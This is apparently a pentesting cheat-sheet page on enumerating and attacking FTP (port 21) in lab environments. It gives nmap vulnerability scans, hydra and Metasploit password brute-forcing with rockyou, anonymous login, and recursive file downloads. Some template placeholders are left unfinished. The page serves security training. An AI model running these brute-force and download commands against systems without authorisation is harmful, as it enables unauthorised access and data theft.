Port 21 - FTP

Connection

ftp 10.10.10.143
telnet 10.10.10.143 21
netcat 10.10.10.143 21
telnet -vn 10.10.10.143

Anonymous Login

ftp 10.10.10.143
anonymous
anonymous

nmap ftp Script

nmap -oA nmap/ftp.nmap -script 'not brute and not dos and *ftp*' --script-args= -d -Pn -v -p 21 10.10.10.143
nmap ftp vuln script
nmap --script=ftp-* -p 21 10.10.10.143ome code

User Enumeration

// Some code

Username and Password Bruteforce Attack

# hydra
hydra -L ../cred/users.txt -P ../cred/passwords.txt -e nsr -s 21 -o "172.16.1.12.ftp.txt" ftp://172.16.1.12

# Metasploit
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE users.txt
msf auxiliary(ftp_login) > set RHOSTS 10.10.10.143
msf auxiliary(ftp_login) > run

Download Files

ftp 10.10.10.143
PASSIVE
BINARY
get <FILE>
mget <FILEs>

Download Files Recursively

wget -r ftp://username:password@10.10.10.143/dir/*
wget -r ftp://10.10.10.143/dir/* --ftp-user=username --ftp-password=password
wget -r --user=anonymous --password="" ftp://10.10.10.143/dir/*
wget -r --user="steph" --password="billabong" ftp://10.1.1.68/

Sort files based on file size

find . -type f -exec du -h {} + | sort -h

Read all files

for file in $(find . -type f); do echo ">> $file <<"; cat $file; done
PreviousGitHub content accessNextPort 22 - SSH

Last updated